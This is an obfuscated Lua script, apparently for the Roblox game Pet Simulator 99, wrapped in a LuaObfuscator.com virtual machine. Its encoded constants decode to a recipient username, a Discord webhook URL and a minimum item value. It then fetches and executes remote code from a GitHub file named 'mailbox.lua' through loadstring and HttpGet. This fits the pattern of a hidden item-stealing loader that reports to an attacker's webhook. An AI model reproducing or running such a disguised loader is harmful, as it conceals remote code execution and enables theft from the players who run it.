--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=0;local v85;while true do if (v84==0) then v85=v2(v0(v30,16));if v19 then local v99=v5(v85,v19);v19=nil;return v99;else return v85;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v86=(v31/(2^(v32-(2 -(1 + 0)))))%(2^(((v33-((879 -(282 + 595)) -1)) -(v32-(1 -0))) + (2 -1))) ;return v86-(v86%(620 -(555 + (1701 -(1523 + 114))))) ;else local v87=0 + 0 ;local v88;while true do if (v87==(931 -(857 + 74))) then v88=(570 -(367 + 201))^(v32-((1322 -394) -(214 + 713))) ;return (((v31%(v88 + v88))>=v88) and (1 + 0)) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + 85))) then return (v41 * (16441815 + 335401)) + (v40 * (14533 + 51003)) + (v39 * (1213 -(892 + 65))) + v38 ;end if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (5 -2) );v18=v18 + (7 -(183 -(67 + 113))) ;v37=351 -(87 + 263) ;end end end local function v24() local v42=(0 -0) + 0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(4 -(1 + 1))) then v47=v20(v44,16 + 5 ,123 -92 );v48=((v20(v44,984 -(802 + (265 -115)) )==1) and  -(2 -1)) or (1 -(438 -(145 + 293))) ;v42=3;end if (v42==(3 + 0)) then if (v47==((1427 -(44 + 386)) -(915 + 82))) then if (v46==(1486 -(998 + 488))) then return v48 * 0 ;else v47=2 -1 ;v45=0 + 0 ;end elseif (v47==(2691 -644)) then return ((v46==(1187 -(340 + 729 + 97 + 21))) and (v48 * ((2 -1)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((1 + 1)^52))) ;end if (v42==1) then v45=1;v46=(v20(v44,1 -0 ,20 + 0 ) * ((793 -(368 + 423))^(100 -68))) + v43 ;v42=20 -(10 + 8) ;end if ((0 -0)==v42) then v43=v23();v44=v23();v42=443 -(416 + 26) ;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(772 -(201 + 571))) then return "";end end v50=v3(v16,v18,(v18 + v49) -(1139 -(116 + 1022)) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((1 + 1)==v52) then v57=nil;v58=nil;v52=3;end if ((3 + 0)==v52) then v59=nil;v60=nil;v52=4 + 0 ;end if (v52==4) then while true do if (v53==(0 + 0)) then local v96=126 -(116 + 10) ;while true do if (v96~=1) then else v53=1;break;end if (v96==0) then v54=0 + 0 ;v55=nil;v96=739 -(542 + 196) ;end end end if (v53==(1 -0)) then local v97=0;local v98;while true do if (v97==0) then v98=0 + 0 ;while true do if (v98==0) then local v135=0;while true do if (v135==1) then v98=1 + 0 ;break;end if (v135~=0) then else v56=nil;v57=nil;v135=1 + 0 ;end end end if (1==v98) then v53=2;break;end end break;end end end if (v53==(4 -2)) then v58=nil;v59=nil;v53=7 -4 ;end if (v53~=3) then else v60=nil;while true do local v100=1551 -(1126 + 425) ;local v101;local v102;while true do if ((405 -(118 + 287))~=v100) then else v101=0;v102=nil;v100=3 -2 ;end if (v100~=1) then else while true do if ((1121 -(118 + 1003))==v101) then v102=0 -0 ;while true do if (v102==1) then if (v54==(379 -(142 + 235))) then local v141=0 -0 ;local v142;while true do if (v141~=(0 + 0)) then else v142=977 -(553 + 424) ;while true do local v147=0;local v148;while true do if (v147~=(0 -0)) then else v148=0;while true do if (v148==(0 + 0)) then if (v142==(1 + 0)) then return v58;end if (v142==0) then local v152=0 + 0 ;local v153;while true do if (v152==(0 + 0)) then v153=0 + 0 ;while true do if (v153~=(0 -0)) then else for v167=1,v23() do local v168=0 -0 ;local v169;local v170;local v171;while true do if (v168==0) then v169=0 -0 ;v170=nil;v168=1;end if (v168==(1 + 0)) then v171=nil;while true do if (v169==0) then local v176=0;local v177;while true do if (v176~=0) then else v177=0 -0 ;while true do if (v177~=(753 -(239 + 514))) then else v170=0 + 0 ;v171=nil;v177=1330 -(797 + 532) ;end if (v177==(1 + 0)) then v169=1 + 0 ;break;end end break;end end end if (v169==1) then while true do if (v170==0) then v171=v21();if (v20(v171,1,1)~=0) then else local v184=0;local v185;local v186;local v187;local v188;local v189;while true do if ((0 -0)~=v184) then else v185=1202 -(373 + 829) ;v186=nil;v184=732 -(476 + 255) ;end if (v184~=1) then else v187=nil;v188=nil;v184=2;end if (v184~=2) then else v189=nil;while true do if (v185~=0) then else v186=1130 -(369 + 761) ;v187=nil;v185=1 + 0 ;end if (v185~=1) then else local v190=0;while true do if (v190~=(1 -0)) then else v185=2;break;end if (v190==(0 -0)) then v188=nil;v189=nil;v190=1;end end end if ((240 -(64 + 174))~=v185) then else while true do if (1==v186) then local v192=0 + 0 ;local v193;local v194;while true do if (v192~=1) then else while true do if (v193~=(0 -0)) then else v194=336 -(144 + 192) ;while true do if (v194==(217 -(42 + 174))) then v186=2 + 0 ;break;end if ((0 + 0)==v194) then local v203=0;while true do if (v203~=0) then else v189={v22(),v22(),nil,nil};if (v187==(0 -0)) then local v205=0 + 0 ;while true do if (v205~=0) then else v189[3 + 0 ]=v22();v189[4]=v22();break;end end elseif (v187==1) then v189[3]=v23();elseif (v187==2) then v189[3]=v23() -(2^16) ;elseif (v187~=3) then else local v214=0;local v215;local v216;while true do if (1~=v214) then else while true do if (v215==(1975 -(1913 + 62))) then v216=0;while true do if ((0 + 0)~=v216) then else v189[3]=v23() -((5 -3)^(1949 -(565 + 1368))) ;v189[15 -11 ]=v22();break;end end break;end end break;end if (v214==(1661 -(1477 + 184))) then v215=0 -0 ;v216=nil;v214=1;end end end v203=1;end if (v203==(1 + 0)) then v194=1;break;end end end end break;end end break;end if (v192==0) then v193=856 -(564 + 292) ;v194=nil;v192=1;end end end if (v186==2) then local v195=0 -0 ;while true do if (v195==(0 -0)) then local v200=0;local v201;while true do if (v200==(304 -(244 + 60))) then v201=0;while true do if (v201==0) then local v204=0 + 0 ;while true do if (v204~=0) then else if (v20(v188,1,1)==1) then v189[478 -(41 + 435) ]=v60[v189[2]];end if (v20(v188,2,1003 -(938 + 63) )==(1 + 0)) then v189[1128 -(936 + 189) ]=v60[v189[3]];end v204=1;end if (v204==(1 + 0)) then v201=1614 -(1565 + 48) ;break;end end end if (v201==1) then v195=1 + 0 ;break;end end break;end end end if (v195~=1) then else v186=3;break;end end end if (v186~=0) then else local v196=1138 -(782 + 356) ;while true do if (v196~=(268 -(176 + 91))) then else v186=1;break;end if (v196~=(0 -0)) then else local v202=0;while true do if (v202~=(1 -0)) then else v196=1093 -(975 + 117) ;break;end if (v202==0) then v187=v20(v171,1877 -(157 + 1718) ,3 + 0 );v188=v20(v171,14 -10 ,6);v202=1;end end end end end if (v186==3) then if (v20(v188,10 -7 ,3)~=(1019 -(697 + 321))) then else v189[10 -6 ]=v60[v189[4]];end v55[v167]=v189;break;end end break;end end break;end end end break;end end break;end end break;end end end for v172=1 -0 ,v23() do v56[v172-(2 -1) ]=v28();end v153=1;end if (v153~=1) then else v142=1 + 0 ;break;end end break;end end end break;end end break;end end end break;end end end break;end if (v102==0) then local v140=0 -0 ;while true do if (v140==(0 -0)) then if (v54~=(1227 -(322 + 905))) then else local v143=611 -(602 + 9) ;local v144;local v145;while true do if (v143==0) then v144=0;v145=nil;v143=1190 -(449 + 740) ;end if (v143==(873 -(826 + 46))) then while true do if ((947 -(245 + 702))~=v144) then else v145=0;while true do if (v145~=2) then else v54=1;break;end if (v145==(3 -2)) then local v154=0;local v155;while true do if (v154==0) then v155=0;while true do if (1==v155) then v145=2;break;end if (v155==0) then v57={};v58={v55,v56,nil,v57};v155=441 -(382 + 58) ;end end break;end end end if (v145==(0 -0)) then local v156=0;local v157;while true do if (v156==0) then v157=0;while true do if (v157==1) then v145=1 + 0 ;break;end if (v157==(0 -0)) then v55={};v56={};v157=2 -1 ;end end break;end end end end break;end end break;end end end if (v54==(1206 -(902 + 303))) then local v146=0 -0 ;while true do if (v146==(0 -0)) then local v149=0 + 0 ;while true do if (v149~=1) then else v146=1691 -(1121 + 569) ;break;end if (v149~=(214 -(22 + 192))) then else v59=v23();v60={};v149=1;end end end if (v146==2) then v54=685 -(483 + 200) ;break;end if (v146==(1464 -(1404 + 59))) then local v150=0 -0 ;local v151;while true do if (v150==(0 -0)) then v151=0;while true do if (v151~=0) then else local v158=765 -(468 + 297) ;while true do if (v158==1) then v151=1;break;end if (v158==0) then for v160=563 -(334 + 228) ,v59 do local v161=0 -0 ;local v162;local v163;local v164;local v165;local v166;while true do if (v161~=(2 -1)) then else v164=nil;v165=nil;v161=2;end if (v161==(2 -0)) then v166=nil;while true do if (v162==(1 + 1)) then while true do if ((236 -(141 + 95))==v163) then local v178=0 + 0 ;local v179;while true do if (v178~=(0 -0)) then else v179=0;while true do if (v179==(2 -1)) then v163=1 + 0 ;break;end if ((0 -0)==v179) then v164=0 + 0 ;v165=nil;v179=1;end end break;end end end if ((1 + 0)~=v163) then else v166=nil;while true do if (v164==(0 -0)) then local v180=0;local v181;local v182;while true do if (0==v180) then v181=0 + 0 ;v182=nil;v180=164 -(92 + 71) ;end if (1==v180) then while true do if (v181==0) then v182=0 + 0 ;while true do if (v182~=0) then else local v191=0;while true do if ((1 -0)~=v191) then else v182=766 -(574 + 191) ;break;end if (v191~=0) then else v165=v21();v166=nil;v191=1;end end end if ((1 + 0)==v182) then v164=2 -1 ;break;end end break;end end break;end end end if (1==v164) then if (v165==(1 + 0)) then v166=v21()~=(849 -(254 + 595)) ;elseif (v165==2) then v166=v24();elseif (v165==(129 -(55 + 71))) then v166=v25();end v60[v160]=v166;break;end end break;end end break;end if (v162~=(0 -0)) then else local v174=1790 -(573 + 1217) ;while true do if (v174~=(0 -0)) then else v163=0;v164=nil;v174=1 + 0 ;end if (v174~=(1 -0)) then else v162=1;break;end end end if (v162==1) then local v175=939 -(714 + 225) ;while true do if (v175==(2 -1)) then v162=2 -0 ;break;end if (v175==0) then v165=nil;v166=nil;v175=1;end end end end break;end if (v161==0) then v162=0;v163=nil;v161=1 + 0 ;end end end v58[3]=v21();v158=1 -0 ;end end end if (v151==(807 -(118 + 688))) then v146=2;break;end end break;end end end end end v140=49 -(25 + 23) ;end if (v140~=1) then else v102=1;break;end end end end break;end end break;end end end break;end end break;end if (v52==1) then v55=nil;v56=nil;v52=2;end if (v52==0) then v53=0 + 0 ;v54=nil;v52=1887 -(927 + 959) ;end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...) local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v89=0,v77 do if (v89>=v71) then v75[v89-v71 ]=v76[v89 + 1 ];else v79[v89]=v76[v89 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do v81=v69[v73];v82=v81[1];if (v82<=3) then if (v82<=1) then if (v82==0) then local v103=0;local v104;while true do if (v103==0) then v104=v81[2];v79[v104]=v79[v104](v13(v79,v104 + 1 ,v74));break;end end else local v105=v81[2];local v106=v79[v81[3]];v79[v105 + 1 ]=v106;v79[v105]=v106[v81[4]];end elseif (v82>2) then local v110=0;local v111;local v112;local v113;local v114;while true do if (v110==1) then v74=(v113 + v111) -1 ;v114=0;v110=2;end if (v110==2) then for v136=v111,v74 do local v137=0;while true do if (v137==0) then v114=v114 + 1 ;v79[v136]=v112[v114];break;end end end break;end if (v110==0) then v111=v81[2];v112,v113=v72(v79[v111](v13(v79,v111 + 1 ,v81[3])));v110=1;end end else v79[v81[2]]=v81[3];end elseif (v82<=5) then if (v82==4) then v79[v81[2]]();else v63[v81[3]]=v79[v81[2]];end elseif (v82<=6) then do return;end elseif (v82==7) then v79[v81[2]]=v63[v81[3]];else local v121;local v122;v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];v73=v73 + 1 ;v81=v69[v73];v63[v81[3]]=v79[v81[2]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v63[v81[3]];v73=v73 + 1 ;v81=v69[v73];v122=v81[2];v121=v79[v81[3]];v79[v122 + 1 ]=v121;v79[v122]=v121[v81[4]];v73=v73 + 1 ;v81=v69[v73];v79[v81[2]]=v81[3];end v73=v73 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!0A3O0003083O00557365724E616D6503093O006D616E696661726D3503073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3132312O3633323933313634313036353439342F443379542D3256535431666F723249736D384C6659756D37324D6F387168462D2O625447554661517068592D4E7942515F6D364F48533250333548497278715155666F3903063O004D696E524150025O0088C340030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403423O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4861726447616D6553732F50532O392F6D61696E2F6D61696C626F782E6C7561000E3O0012083O00023O00124O00013O00124O00043O00124O00033O00124O00063O00124O00053O00124O00073O00122O000100083O00202O00010001000900122O0003000A4O0003000100039O0000022O00043O000100012O00063O00017O00",v9(),...);
